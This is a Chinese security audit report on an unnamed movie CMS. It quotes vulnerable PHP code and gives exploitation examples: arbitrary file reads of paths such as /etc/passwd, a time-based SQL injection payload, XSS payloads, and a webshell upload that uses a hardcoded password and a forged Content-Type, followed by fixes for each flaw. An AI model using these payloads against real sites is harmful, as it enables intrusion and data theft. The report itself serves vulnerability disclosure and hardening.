某电影CMS安全审计报告与漏洞分析<\/h1>

1. 文件读取漏洞<\/h2>

1.1 like.php 文件读取漏洞<\/h3>
位置<\/strong>: data\/like.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
$fang=<\/span>$_GET['play'<\/span>];
<\/span><\/span>$jmfang=<\/span>base64_decode<\/span>($fang);
<\/span><\/span>$like=<\/span>file_get_contents<\/span>($jmfang);
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

直接通过play<\/code>参数接收用户输入<\/li>
对输入进行base64解码后直接传递给file_get_contents()<\/code><\/li>
无任何过滤或限制，导致任意文件读取<\/li>
<\/ul>
利用方法<\/strong>:<\/p>

将目标文件路径进行base64编码<\/li>
通过play参数传递编码后的路径<\/li>
示例: like.php?play=base64_encode('\/etc\/passwd')<\/code><\/li>
<\/ol>
限制<\/strong>:<\/p>

虽然可以读取文件内容，但由于后续的正则匹配处理，可能不会直接显示文件内容<\/li>
需要结合其他技术手段提取数据<\/li>
<\/ul>
1.2 play.php 文件读取漏洞<\/h3>
位置<\/strong>: play.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
$player =<\/span> base64_decode<\/span>($_GET['play'<\/span>]);
<\/span><\/span>$tvinfo =<\/span> file_get_contents<\/span>($player);
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

与like.php类似，直接解码并读取文件<\/li>
同样缺乏过滤和限制<\/li>
<\/ul>
2. SQL注入漏洞<\/h2>
2.1 agent\/index.php SQL注入<\/h3>
位置<\/strong>: agent\/index.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
if<\/span>($_GET['type'<\/span>]==<\/span>'Sell'<\/span> and<\/span> $_GET['id'<\/span>]!=<\/span>''<\/span>){  
<\/span><\/span>   $cm-><\/span>query<\/span>("UPDATE d_kami SET km_sell=1 WHERE km_id ='"<\/span>.<\/span>$_GET['id'<\/span>].<\/span>"'"<\/span>);
<\/span><\/span>   echo<\/span> tiao<\/span>("已复制好，可贴粘。"<\/span>, "index.php"<\/span>);
<\/span><\/span>    exit<\/span>();
<\/span><\/span>  }
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

id<\/code>参数直接拼接进SQL语句，无任何过滤<\/li>
攻击者可构造恶意SQL语句进行注入<\/li>
需要先注册代理账号才能利用<\/li>
<\/ul>
利用方法<\/strong>:<\/p>

注册代理账号并登录<\/li>
构造恶意请求: agent\/index.php?type=Sell&id=123' AND (SELECT 1 FROM (SELECT SLEEP(5))a)-- <\/code><\/li>
<\/ol>
2.2 时间盲注漏洞<\/h3>
位置<\/strong>: agent\/index.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
if<\/span>($_GET['type'<\/span>]==<\/span>'close'<\/span> and<\/span> $_GET['id'<\/span>]!=<\/span>''<\/span>){  
<\/span><\/span>   $cm-><\/span>query<\/span>("UPDATE d_kami SET km_sell=0 WHERE km_id ='"<\/span>.<\/span>$_GET['id'<\/span>].<\/span>"'"<\/span>);
<\/span><\/span>   echo<\/span> backs<\/span>("卡密取消复制成功！"<\/span>);
<\/span><\/span>   exit<\/span>();
<\/span><\/span>  } 
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

与上述注入类似，可用于时间盲注<\/li>
通过响应时间判断注入结果<\/li>
<\/ul>
3. XSS跨站脚本漏洞<\/h2>
3.1 payreturn.php 反射型XSS<\/h3>
位置<\/strong>: payreturn.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
$orderid =<\/span> $_GET["orderid"<\/span>];
<\/span><\/span>echo<\/span> $orderid;
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

直接输出未过滤的用户输入<\/li>
可构造恶意JavaScript代码执行<\/li>
<\/ul>
利用方法<\/strong>:<\/p>
payreturn.php?orderid=<script>alert(\/xss\/)<\/script>
<\/code><\/pre>
3.2 admin\/edituser.php 存储型XSS<\/h3>
位置<\/strong>: admin\/edituser.php<\/code><\/p>
漏洞代码<\/strong>:<\/p>
echo<\/span> tiao<\/span>("修改成功！"<\/span>, "edituser.php?id="<\/span> .<\/span> $_POST["id"<\/span>]);
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

直接将POST的id参数输出到JavaScript中<\/li>
需要闭合前面的JavaScript代码才能执行<\/li>
<\/ul>
利用方法<\/strong>:<\/p>
POST数据: admin_aglevel=1&id=123<\/script>');<script<\/span>>alert<\/span>(\/xss\/<\/span>)<\/script<\/span>>('
<\/span><\/span><\/code><\/pre>绕过技巧<\/strong>:<\/p>

闭合前面的JavaScript代码<\/li>
插入自己的恶意代码<\/li>
确保整体语法正确<\/li>
<\/ul>
4. 文件上传漏洞<\/h2>
位置<\/strong>: 未明确指定文件名(可能是index.php)<\/p>
漏洞代码<\/strong>:<\/p>
if<\/span>(is_array<\/span>($_FILES["upfile"<\/span>])){
<\/span><\/span>$i=<\/span>0<\/span>;
<\/span><\/span>if<\/span>($_POST['pwd'<\/span>] !=<\/span> $passwd){
<\/span><\/span>    echo<\/span> '<script>alert("ûȨȨ")<\/script>'<\/span>;
<\/span><\/span>    exit<\/span>;
<\/span><\/span>}
<\/span><\/span>\/\/...省略部分代码...
<\/span><\/span><\/span><\/span>$file =<\/span> $_FILES["upfile"<\/span>];
<\/span><\/span>if<\/span>(!<\/span>in_array<\/span>($file["type"<\/span>][$i], $uptypes))
<\/span><\/span>\/\/...省略部分代码...
<\/span><\/span><\/span><\/span>$pinfo=<\/span>pathinfo<\/span>($file["name"<\/span>][$i]);
<\/span><\/span>$ftype=<\/span>$pinfo[extension<\/span>];
<\/span><\/span>$destination =<\/span> $destination_folder.<\/span>$i.<\/span>time<\/span>().<\/span>"."<\/span>.<\/span>$ftype;
<\/span><\/span><\/code><\/pre>漏洞分析<\/strong>:<\/p>

存在上传密码保护，但密码硬编码在inc\/aik.config.php<\/code>中(tu_pass=123456<\/code>)<\/li>
仅检查Content-Type，可通过修改绕过<\/li>
最终文件名使用原始扩展名，可直接上传PHP文件<\/li>
<\/ol>
利用方法<\/strong>:<\/p>

获取上传密码(123456)<\/li>
构造上传表单，修改Content-Type为允许的类型(如image\/jpeg)<\/li>
上传PHP文件(如phpinfo.php或webshell)<\/li>
<\/ol>
完整利用步骤<\/strong>:<\/p>

准备上传表单:<\/li>
<\/ol>
<form<\/span> action<\/span>=<\/span>"upload.php"<\/span> method<\/span>=<\/span>"post"<\/span> enctype<\/span>=<\/span>"multipart\/form-data"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"file"<\/span> name<\/span>=<\/span>"upfile[]"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"password"<\/span> name<\/span>=<\/span>"pwd"<\/span> value<\/span>=<\/span>"123456"<\/span>>
<\/span><\/span>    <input<\/span> type<\/span>=<\/span>"submit"<\/span>>
<\/span><\/span><\/form<\/span>>
<\/span><\/span><\/code><\/pre>
使用Burp Suite等工具修改Content-Type<\/li>
上传PHP文件获取webshell<\/li>
<\/ol>
5. 安全建议<\/h2>
5.1 文件读取防护<\/h3>

避免直接使用用户输入作为文件路径<\/li>
如果需要，应严格限制可访问的目录和文件类型<\/li>
使用白名单机制验证文件路径<\/li>
<\/ul>
5.2 SQL注入防护<\/h3>

使用预处理语句(PDO或mysqli)<\/li>
对所有用户输入进行严格的过滤和转义<\/li>
使用框架提供的安全查询方法<\/li>
<\/ul>
5.3 XSS防护<\/h3>

对所有输出到页面的内容进行HTML实体编码<\/li>
设置Content Security Policy(CSP)头<\/li>
使用HTTPOnly和Secure标志的Cookie<\/li>
<\/ul>
5.4 文件上传防护<\/h3>

不要依赖客户端验证(如Content-Type)<\/li>
检查文件内容而不仅是扩展名<\/li>
重命名上传文件并使用安全的扩展名<\/li>
将上传文件存储在非web可访问目录<\/li>
设置上传目录无执行权限<\/li>
<\/ul>
5.5 其他建议<\/h3>

避免在代码中硬编码敏感信息(如密码)<\/li>
实施最小权限原则<\/li>
定期进行安全审计和代码审查<\/li>
保持系统和组件更新<\/li>
<\/ul>
6. 总结<\/h2>
本次审计发现了某电影CMS中存在的多个严重安全漏洞，包括文件读取、SQL注入、XSS和文件上传漏洞。这些漏洞可导致敏感信息泄露、数据库篡改、跨站脚本攻击甚至服务器完全沦陷。建议开发者立即修复这些漏洞，并全面审查代码中的安全问题。<\/p>